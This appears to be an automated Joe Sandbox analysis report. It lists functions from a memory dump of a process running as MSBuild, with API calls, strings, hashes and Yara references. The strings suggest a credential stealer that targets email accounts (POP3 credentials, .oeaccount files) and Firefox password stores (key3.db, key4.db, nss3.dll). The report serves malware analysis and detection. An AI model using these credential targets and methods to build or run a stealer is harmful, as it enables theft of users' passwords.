SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
GetSysColor.USER32(0000000F), ref: 0040B472
DeleteObject.GDI32(?), ref: 0040B4A6
DeleteObject.GDI32(00000000), ref: 0040B4A9
SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$DeleteImageLoadObject$Color
String ID:
API String ID: 3642520215-0
Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68

Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
memset.MSVCRT ref: 00405C3B
??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
SetFocus.USER32(?,?,?,?), ref: 00405CC0
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: b9188961e212d22c96b05f3ed6f298190e450c3cdba4e2f12b46b9c83a8f8dd8
Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
Opcode Fuzzy Hash: b9188961e212d22c96b05f3ed6f298190e450c3cdba4e2f12b46b9c83a8f8dd8
Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94

Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0040BB33
GetWindowRect.USER32(?,?), ref: 0040BB49
GetWindowRect.USER32(?,?), ref: 0040BB5C
BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
EndDeferWindowPos.USER32(?), ref: 0040BBE6

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Defer$Rect$BeginClient
String ID:
API String ID: 2126104762-0
Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24

Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000011), ref: 004072E7
GetSystemMetrics.USER32(00000010), ref: 004072ED
GetDC.USER32(00000000), ref: 004072FB
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
GetWindowRect.USER32(004012E4,?), ref: 0040732C
MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
String ID:
API String ID: 1999381814-0
Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90

Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004263C1
memcpy.MSVCRT(?,?,?), ref: 00426631

Strings

string or blob too big, xrefs: 00425B2E
out of memory, xrefs: 00426747
unknown error, xrefs: 004277B2
statement aborts at %d: [%s] %s, xrefs: 00425B5F
abort due to ROLLBACK, xrefs: 00428781

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset
String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
API String ID: 1297977491-3883738016
Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99

Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616

memcpy.MSVCRT(?,?,00000040), ref: 0044972E
memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
memcpy.MSVCRT(?,?,00000040), ref: 004497F6

Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD

memcpy.MSVCRT(?,?,00000000), ref: 00449846
memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8

Strings

gj, xrefs: 00449649

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset
String ID: gj
API String ID: 438689982-4203073231
Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796

Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 00412463
__aullrem.LIBCMT ref: 00412479
__aulldvrm.LIBCMT ref: 004124CE

Strings

-, xrefs: 00412376
0123456789ABCDEF0123456789abcdef, xrefs: 004124AF
-x0, xrefs: 0041253D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: __aulldvrm$__aullrem
String ID: -$-x0$0123456789ABCDEF0123456789abcdef
API String ID: 643879872-978417875
Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A

Function 0040DAC2 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DAE3
memset.MSVCRT ref: 0040DAF7
memset.MSVCRT ref: 0040DB0B

Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38

Strings

user_pref(", xrefs: 0040DB41

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset$strlen$_memicmp
String ID: user_pref("
API String ID: 765841271-2487180061
Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8

Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00405827
SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
memset.MSVCRT ref: 004058C3
SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
SetFocus.USER32(?), ref: 00405976

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94

Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D

_mbscat.MSVCRT ref: 0040A8FF
sprintf.MSVCRT ref: 0040A921

Strings

<tr>, xrefs: 0040A85F
<td bgcolor=#%s>%s, xrefs: 0040A851
<td bgcolor=#%s nowrap>%s, xrefs: 0040A845
 , xrefs: 0040A8F9

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FileWrite_mbscatsprintfstrlen
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 1631269929-4153097237
Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84

Function 00408DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31

Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261

strlen.MSVCRT ref: 00408E4F
LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
memcpy.MSVCRT(00000000,00000001), ref: 00408EBE

Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8

Strings

strings, xrefs: 00408E27
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
API String ID: 4036804644-4125592482
Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E

Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040810E

Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16

Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA

Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754

WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9

Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8

Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20

Strings

POP3_host, xrefs: 004081E1
POP3_credentials, xrefs: 0040811E
POP3_name, xrefs: 004081C6

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
String ID: POP3_credentials$POP3_host$POP3_name
API String ID: 524865279-2190619648
Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64

Function 00406B6D Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 86stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406B8E
strlen.MSVCRT ref: 00406B99
strlen.MSVCRT ref: 00406BFF
strlen.MSVCRT ref: 00406C0D
strlen.MSVCRT ref: 00406BA7

Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA

Strings

key3.db, xrefs: 00406C05, 00406C0A, 00406C1B
key4.db, xrefs: 00406B9F, 00406BA4, 00406BBA

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: key3.db$key4.db
API String ID: 581844971-3557030128
Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658

Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 004093C7
memset.MSVCRT ref: 004093E8
GetMenuItemInfoA.USER32 ref: 00409423
strchr.MSVCRT ref: 0040943A

Strings

0, xrefs: 00409403
6, xrefs: 0040940B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ItemMenu$CountInfomemsetstrchr
String ID: 0$6
API String ID: 2300387033-3849865405
Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A

Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004076D7
sprintf.MSVCRT ref: 00407704
strlen.MSVCRT ref: 00407710
memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
strlen.MSVCRT ref: 00407733
memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743

Strings

%s (%s), xrefs: 004076FE

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpystrlen$memsetsprintf
String ID: %s (%s)
API String ID: 3756086014-1363028141
Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98

Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
CoTaskMemFree.COMBASE(?), ref: 004108D2

Strings

5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
00000000-0000-0000-0000-000000000000, xrefs: 00410882

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: FromStringUuid$FreeTaskmemcpy
String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
API String ID: 1640410171-3316789007
Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4

Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040740E
sprintf.MSVCRT ref: 0040742F
_mbscat.MSVCRT ref: 00407441
_mbscat.MSVCRT ref: 0040745E
_mbscat.MSVCRT ref: 0040746D

Strings

%2.2X, xrefs: 00407429

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscat$memsetsprintf
String ID: %2.2X
API String ID: 125969286-791839006
Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E

Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13

GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1

Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577

Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E

??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
CloseHandle.KERNEL32(?), ref: 00444206

Strings

ACD, xrefs: 00444196

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
String ID: ACD
API String ID: 1886237854-620537770
Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64

Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004091EC
sprintf.MSVCRT ref: 00409201

Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC

SetWindowTextA.USER32(?,?), ref: 00409228
EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238

Strings

dialog_%d, xrefs: 004091F7
caption, xrefs: 0040920D

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
String ID: caption$dialog_%d
API String ID: 2923679083-4161923789
Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E

Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E

Strings

cannot open savepoint - SQL statements in progress, xrefs: 00426934
unknown error, xrefs: 004277B2
no such savepoint: %s, xrefs: 00426A02
cannot release savepoint - SQL statements in progress, xrefs: 00426A20
abort due to ROLLBACK, xrefs: 00428781

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
API String ID: 3510742995-3035234601
Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99

